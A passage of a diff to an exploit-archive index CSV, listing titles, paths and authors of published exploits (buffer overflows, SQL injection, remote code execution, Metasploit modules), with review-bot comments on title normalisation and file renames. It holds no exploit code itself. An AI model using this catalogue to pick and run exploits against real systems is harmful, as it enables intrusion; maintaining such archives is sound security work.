Execution",2010-02-09,"Sumit Gwalani",remote,windows, 
@@ -14857,7 +14860,7 @@ id,file,description,date,author,type,platform,port 33540,exploits/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,remote,windows, 33552,exploits/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",remote,windows, 33553,exploits/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 - Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,remote,multiple, -33554,exploits/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,remote,linux, +33554,exploits/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub",2014-05-28,bwall,remote,linux, 33562,exploits/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",remote,multiple, 33563,exploits/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",remote,windows, 33567,exploits/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",remote,hardware, 
@@ -15006,7 +15009,7 @@ id,file,description,date,author,type,platform,port 34461,exploits/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",remote,multiple, 34462,exploits/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",remote,windows, 34478,exploits/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",remote,windows, -40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,remote,linux, +40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Remote Stack Buffer Overflow",2016-09-06,SpeeDr00t,remote,linux, 34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple, 34507,exploits/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",remote,linux, 34517,exploits/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,remote,windows,5466 
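Review bot: The 40339 row does more than drop "Based": it also inserts "Remote", turning "Stack Based Buffer Overflow" into "Remote Stack Buffer Overflow". Other remote-typed rows renamed in this patch (37576, 32225, 30565) get no such prefix, and the type column already says remote, so either apply the prefix consistently or leave this title as "Stack Buffer Overflow".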
@@ -15187,7 +15190,6 @@ id,file,description,date,author,type,platform,port 35686,exploits/windows/remote/35686.pl,"OpenMyZip 0.1 - '.zip' Remote Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",remote,windows, 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware, 35694,exploits/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,remote,windows, -35714,exploits/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow",2011-05-09,KedAns-Dz,remote,windows, 35703,exploits/multiple/remote/35703.py,"sipdroid 2.2 - SIP INVITE Response User Enumeration",2011-05-04,"Anibal Vaz Marques",remote,multiple, 35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple, 35731,exploits/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,remote,php,80 
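Review bot: The 35714 row (BlueVoda Website Builder 11 '.bvp') is removed outright between 35694 and 35703 rather than retitled, the same pattern as 26497 earlier in the patch. The title describes a file-format overflow, which suggests a move to another type, but nothing in this hunk shows where the row goes; confirm it reappears with an updated path and that exploits/windows/remote/35714.pl is moved in the same commit.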
@@ -15223,7 +15225,7 @@ id,file,description,date,author,type,platform,port 35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware, 35845,exploits/java/remote/35845.rb,"ManageEngine (Multiple Products) - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,remote,java,8080 35855,exploits/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",remote,php, -35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",remote,windows, +35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",remote,windows, 35880,exploits/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",remote,windows, 35881,exploits/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",remote,windows, 35885,exploits/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",remote,windows, 
@@ -15344,7 +15346,7 @@ id,file,description,date,author,type,platform,port 36810,exploits/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 36811,exploits/php/remote/36811.rb,"WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 36812,exploits/php/remote/36812.rb,"WordPress Plugin Work The Flow - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 -36829,exploits/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",remote,windows, +36829,exploits/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",remote,windows, 36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, 36832,exploits/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, 36833,exploits/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, 
@@ -15399,7 +15401,7 @@ id,file,description,date,author,type,platform,port 37523,exploits/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,remote,multiple, 37536,exploits/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,remote,multiple, 37542,exploits/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,remote,windows, -37576,exploits/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",remote,linux, +37576,exploits/linux/remote/37576.cpp,"Alligra Calligra - Heap Buffer Overflow",2012-08-07,"Charlie Miller",remote,linux, 37597,exploits/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,remote,hardware,443 37598,exploits/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,remote,multiple,5900 37599,exploits/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,remote,windows, 
@@ -15554,7 +15556,7 @@ id,file,description,date,author,type,platform,port 38732,exploits/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,remote,php,9999 38733,exploits/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,remote,php,9999 38741,exploits/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",remote,linux, -38742,exploits/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",remote,windows, +38742,exploits/windows/remote/38742.txt,"Aloaha PDF Suite - Remote Stack Buffer Overflow",2013-08-28,"Marcos Accossatto",remote,windows, 38764,exploits/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,remote,hardware,443 38766,exploits/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",remote,multiple, 38797,exploits/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,remote,php,80 
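Review bot: The 38742 row gains a "Remote" prefix in addition to losing "Based" ("Stack Based Buffer Overflow" becomes "Remote Stack Buffer Overflow"). The same extra word is added to 40339 but not to the other renamed remote rows, so the normalization is applied unevenly; decide on one rule for remote-typed titles and apply it to every row the patch touches.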
@@ -15601,6 +15603,7 @@ id,file,description,date,author,type,platform,port 39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows, 39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple, 39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, +39102,exploits/windows/remote/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,remote,windows, 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios, 39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple, 39119,exploits/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",remote,windows, 
@@ -15679,6 +15682,7 @@ id,file,description,date,author,type,platform,port 39985,exploits/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",remote,windows,1604 39999,exploits/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,remote,win_x86-64,21 40004,exploits/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,remote,php,80 +40043,exploits/windows/remote/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",remote,windows, 40064,exploits/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",remote,linux, 40067,exploits/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution (Metasploit)",2016-07-06,Metasploit,remote,linux,80 40108,exploits/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,remote,linux,443 
@@ -15922,7 +15926,7 @@ id,file,description,date,author,type,platform,port 42630,exploits/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Remote Buffer Overflow (Metasploit)",2017-09-07,Metasploit,remote,windows,80 42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375 42683,exploits/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,remote,windows, -42691,exploits/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42691,exploits/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 42692,exploits/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,php, 42693,exploits/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 42694,exploits/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,46824 
@@ -15930,7 +15934,7 @@ id,file,description,date,author,type,platform,port 42696,exploits/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,3814 42697,exploits/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",remote,linux, 42698,exploits/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",remote,jsp, -42700,exploits/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42700,exploits/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 42701,exploits/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java, 42702,exploits/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java, 42703,exploits/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 
@@ -15988,6 +15992,7 @@ id,file,description,date,author,type,platform,port 43145,exploits/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow",2017-11-14,sickness,remote,windows,80 42886,exploits/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow",2017-10-20,mschenk,remote,windows, 43163,exploits/windows/remote/43163.txt,"Microsoft Office - OLE Remote Code Execution",2017-11-20,embedi,remote,windows, +43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -21424,7 +21429,7 @@ id,file,description,date,author,type,platform,port 9028,exploits/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",webapps,php, 9030,exploits/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - 'category' SQL Injection",2009-06-29,"Chip d3 bi0s",webapps,php, 9032,exploits/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",webapps,php, -9035,exploits/php/webapps/9035.txt,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,webapps,php, +9035,exploits/php/webapps/9035.php,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,webapps,php, 9036,exploits/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php?t' Local File Inclusion",2009-06-29,ahmadbady,webapps,php, 9037,exploits/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",webapps,php, 9040,exploits/php/webapps/9040.txt,"Joomla! Component com_bookflip - 'book_id' SQL Injection",2009-06-29,boom3rang,webapps,php, 
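Review bot: The 9035 row changes only the file column, from exploits/php/webapps/9035.txt to 9035.php, with the title untouched. Confirm the file itself is renamed in this commit, because any tool that resolves entries through the CSV path will otherwise point at a file that does not exist, and any mirror or reference holding the old .txt path breaks.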
@@ -24804,7 +24809,7 @@ id,file,description,date,author,type,platform,port 17094,exploits/php/webapps/17094.html,"Allomani Web Links 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, 17095,exploits/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, 17096,exploits/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, -17123,exploits/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,webapps,php, +17123,exploits/php/webapps/17123.txt,"Tutorialms 1.4 - 'show' SQL Injection",2011-04-05,LiquidWorm,webapps,php, 17098,exploits/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",webapps,php, 17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php, 17100,exploits/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php?id' SQL Injection",2011-04-02,"Easy Laster",webapps,php, 
@@ -24923,6 +24928,7 @@ id,file,description,date,author,type,platform,port 17347,exploits/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,webapps,php, 17349,exploits/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Remote Hash Exposed",2011-05-30,Aodrulez,webapps,hardware, 17350,exploits/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,webapps,php, +43191,exploits/php/webapps/43191.py,"osCommerce 2.3.4.1 - Arbitrary File Upload",2017-11-11,"Simon Scannell",webapps,php, 17360,exploits/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,webapps,windows, 17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php, 17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp, 
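Review bot: The new 43191 row (osCommerce 2.3.4.1, dated 2017-11-11) is inserted between 17350 and 17360, among rows dated 2011, whereas the other new 2017 entry visible in this patch, 43193, is appended at the end of its type section. Check that this position is intended and not a side effect of how the row was generated; if placement carries no meaning, appending it with the other recent webapps rows keeps later diffs easier to read.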
@@ -25930,7 +25936,7 @@ id,file,description,date,author,type,platform,port 21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, 21270,exploits/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, -21272,exploits/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,webapps,asp, +21272,exploits/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.0 - SQL Injection",2012-09-12,Vulnerability-Lab,webapps,asp, 21273,exploits/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",webapps,php, 21277,exploits/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,webapps,php, 21278,exploits/php/webapps/21278.txt,"Portix-PHP 0.4 - 'view.php' Directory Traversal",2002-02-04,frog,webapps,php, 
@@ -36282,7 +36288,7 @@ id,file,description,date,author,type,platform,port 38746,exploits/php/webapps/38746.html,"Xibo - Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",webapps,php, 38748,exploits/php/webapps/38748.txt,"dBlog CMS - 'm' SQL Injection",2013-09-03,ACC3SS,webapps,php, 38749,exploits/asp/webapps/38749.txt,"Flo CMS - 'archivem' SQL Injection",2013-09-03,ACC3SS,webapps,asp, -38750,exploits/php/webapps/38750.txt,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",webapps,php, +38750,exploits/php/webapps/38750.md,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",webapps,php, 38753,exploits/php/webapps/38753.html,"WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,webapps,php, 38754,exploits/php/webapps/38754.txt,"eTransfer Lite - 'file name' HTML Injection",2013-09-10,"Benjamin Kunz Mejri",webapps,php, 38755,exploits/php/webapps/38755.txt,"WordPress Plugin mukioplayer4wp - 'cid' SQL Injection",2013-09-13,"Ashiyane Digital Security Team",webapps,php, 
@@ -36538,7 +36544,7 @@ id,file,description,date,author,type,platform,port 39239,exploits/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,webapps,php, 39240,exploits/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - '/wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",webapps,php, 39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848 -39243,exploits/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,webapps,php,80 +39243,exploits/php/webapps/39243.md,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,webapps,php,80 39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",webapps,php,80 39246,exploits/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",webapps,php,80 39250,exploits/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,webapps,php, 
@@ -36875,7 +36881,7 @@ id,file,description,date,author,type,platform,port 40060,exploits/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",webapps,jsp,80 40062,exploits/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",webapps,php,80 40063,exploits/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",webapps,cgi,80 -40065,exploits/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,webapps,jsp,80 +40065,exploits/jsp/webapps/40065.md,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,webapps,jsp,80 40068,exploits/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",webapps,php,80 40070,exploits/php/webapps/40070.txt,"WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)",2016-07-08,"Persian Hack Team",webapps,php,80 40076,exploits/php/webapps/40076.php,"PHP Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",webapps,php,80 
@@ -37104,7 +37110,7 @@ id,file,description,date,author,type,platform,port 40852,exploits/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",webapps,php, 40853,exploits/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,webapps,hardware, 40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware, -40877,exploits/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, +40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware, 40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, 40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, 
@@ -37248,7 +37254,7 @@ id,file,description,date,author,type,platform,port 41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,webapps,linux, 41143,exploits/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",webapps,php, 41147,exploits/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",webapps,hardware, -41150,exploits/php/webapps/41150.txt,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80 +41150,exploits/php/webapps/41150.md,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80 41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",webapps,php, 41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",webapps,php, 41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",webapps,php, 
@@ -37636,8 +37642,8 @@ id,file,description,date,author,type,platform,port 41733,exploits/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, 41735,exploits/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' SQL Injection",2017-03-27,"Ihsan Sencan",webapps,php, 41736,exploits/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' SQL Injection",2017-03-27,"Ihsan Sencan",webapps,php, -41746,exploits/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,webapps,php, -41747,exploits/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,webapps,php, +41746,exploits/php/webapps/41746.md,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,webapps,php, +41747,exploits/php/webapps/41747.md,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,webapps,php, 41748,exploits/jsp/webapps/41748.rb,"Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,webapps,jsp, 41749,exploits/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",webapps,php, 41758,exploits/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' SQL Injection",2017-03-29,"Ihsan Sencan",webapps,php, 
@@ -37720,7 +37726,7 @@ id,file,description,date,author,type,platform,port 41962,exploits/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",webapps,linux, 41963,exploits/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",webapps,linux, 41966,exploits/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,webapps,php,80 -41967,exploits/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,webapps,php,80 +41967,exploits/php/webapps/41967.md,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,webapps,php,80 41976,exploits/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",webapps,linux, 41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command 